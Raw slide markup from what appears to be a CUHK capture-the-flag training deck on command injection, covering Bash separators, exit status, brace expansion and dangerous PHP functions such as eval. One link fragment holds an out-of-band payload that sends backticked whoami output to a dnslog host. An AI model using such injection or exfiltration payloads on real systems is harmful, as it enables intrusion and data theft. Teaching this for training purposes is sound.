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Roboto"/>
      <p:regular r:id="rId47"/>
      <p:bold r:id="rId48"/>
      <p:italic r:id="rId49"/>
      <p:boldItalic r:id="rId50"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Fira Sans"/>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hoRiWpzKVxO4mdYmRpVzF/lsDv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iraSans-regular.fntdata"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto-boldItalic.fntdata"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/FiraSans-italic.fntdata"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/FiraSans-bold.fntdata"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide7.xml"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/OpenSans-regular.fntdata"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide6.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/FiraSans-boldItalic.fntdata"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide9.xml"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/OpenSans-italic.fntdata"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide8.xml"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/OpenSans-bold.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difference with command execution is:One executes system commands and the other executes PHP code</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148" name="Google Shape;1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Sometimes it is desirable to make sure that the next command in a Linux command only runs when the previous command ends successfully. This is where the logic and the operator &amp;&amp; appear. Only if the command to the left of &amp;&amp; returns true (command return value $? == 0), the commands to the right of &amp;&amp; are executed; as soon as one command returns false ($? == 1), subsequent commands are not executed.</a:t>
            </a:r>
            <a:endParaRPr/>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Bash, the pipe operator (|) creates a ‘pipeline’ between commands. It takes the standard output (stdout) of the command to the left and pipes it as the standard input (stdin) to the command on the right. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="184" name="Google Shape;18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Commands are connected using ||, which implements the logical or function.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same as the logical or syntax in c, which implements a logical or operation. As long as one command returns true ($? == 0), subsequent commands will not be executed.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opposite of what &amp;&amp; does!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="192" name="Google Shape;19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symbol acts like a "range" or "set" in a regular expression.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="215" name="Google Shape;21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00000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>The OWASP Top 10 is a standard awareness document for developers and web application security. It represents a broad consensus about the most critical security risks to web applications.</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222222"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>This prints out all the two letter combinations of the alphabet, from </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>aa</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>zz</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="223" name="Google Shape;22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222222"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>This prints out all the two letter combinations of the alphabet, from </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>aa</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>zz</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="230" name="Google Shape;23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222222"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>This prints out all the two letter combinations of the alphabet, from </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>aa</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>zz</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>.. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="0">
              <a:solidFill>
                <a:srgbClr val="222222"/>
              </a:solidFill>
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>list items must be separated by comma only and don’t add any space between the items, otherwise brace expansion will not work.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="237" name="Google Shape;23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damage is self-evident.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119" name="Google Shape;1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5183188" y="987425"/>
            <a:ext cx="6172200" cy="4873625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Google Shape;68;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gnu.org/software/bash/manual/html_node/Shell-Parameter-Expansion.html" TargetMode="Externa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paper.seebug.org/16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testhash.test.dnslog.link/?%60whoami%6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CUHK CTF Training Camp</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Web 0x01</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Zeddy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 Command Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151" name="Google Shape;15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Other funtions allow execute code:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="685800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eval(‘system(“ls”);’);</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Dangerous Funcs in PHP:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="685800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>eval()</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="685800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>assert()</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="685800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>preg_replace()</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="685800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>call_user_function()</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="685800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pP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Basic Linux Command</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157" name="Google Shape;15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Unless otherwise noted, we use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>as our shell.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t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="163" name="Google Shape;16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Fira Sans"/>
                <a:ea typeface="Fira Sans"/>
                <a:cs typeface="Fira Sans"/>
                <a:sym typeface="Fira Sans"/>
              </a:rPr>
              <a:t>Expands to the exit status of the most recently executed foreground pipeline.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Fira Sans"/>
              <a:ea typeface="Fira Sans"/>
              <a:cs typeface="Fira Sans"/>
              <a:sym typeface="Fira Sans"/>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latin typeface="Fira Sans"/>
                <a:ea typeface="Fira Sans"/>
                <a:cs typeface="Fira Sans"/>
                <a:sym typeface="Fira Sans"/>
              </a:rPr>
              <a:t>$? == 0, execute successfully; $? == 1, fail to execute</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-50800" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Fira Sans"/>
              <a:ea typeface="Fira Sans"/>
              <a:cs typeface="Fira Sans"/>
              <a:sym typeface="Fira Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-50800" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="164" name="Google Shape;164;p12"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6813862" y="4505134"/>
            <a:ext cx="4428571" cy="1552381"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="165" name="Google Shape;165;p12"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="568226" y="4505134"/>
            <a:ext cx="4994096" cy="15523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171" name="Google Shape;17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Semicolon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40C28"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="040C28"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="040C28"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>ommand Separators</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0C0D0E"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="0C0D0E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>That is, each command runs one and then the next. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Whether the previous command runs successfully or with an error</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="0C0D0E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>, the next command runs next.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Example: cmd1;cmd2;cmd3</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2" name="Google Shape;172;p13"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7811048" y="4296095"/>
            <a:ext cx="4380952" cy="25619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179" name="Google Shape;17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&amp;&amp;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C0D0E"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="0C0D0E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Logical AND</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0C0D0E"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="0C0D0E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Only if the command to the left of </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="0C0D0E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> returns true (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>$? == 0</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="0C0D0E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>), the commands to the right of </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="0C0D0E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> are executed;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>as soon as one command returns false (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$? == 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>), subsequent commands will be not executed.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0C0D0E"/>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US"/>
              <a:t>Example: cmd1 &amp;&amp; cmd2 &amp;&amp; cmd3</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0" name="Google Shape;180;p14"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7887238" y="4915143"/>
            <a:ext cx="4304762" cy="19428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187" name="Google Shape;18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pipe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It takes the standard output (stdout) of the command to the left and pipes it as the standard input (stdin) to the command on the right. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="228600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Example: cmd1 | cmd2</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8" name="Google Shape;188;p15"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2962867" y="4949222"/>
            <a:ext cx="6266265" cy="12277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195" name="Google Shape;19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Logical OR </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Only if the command to the left of </a:t>
            </a:r>
            <a:r>
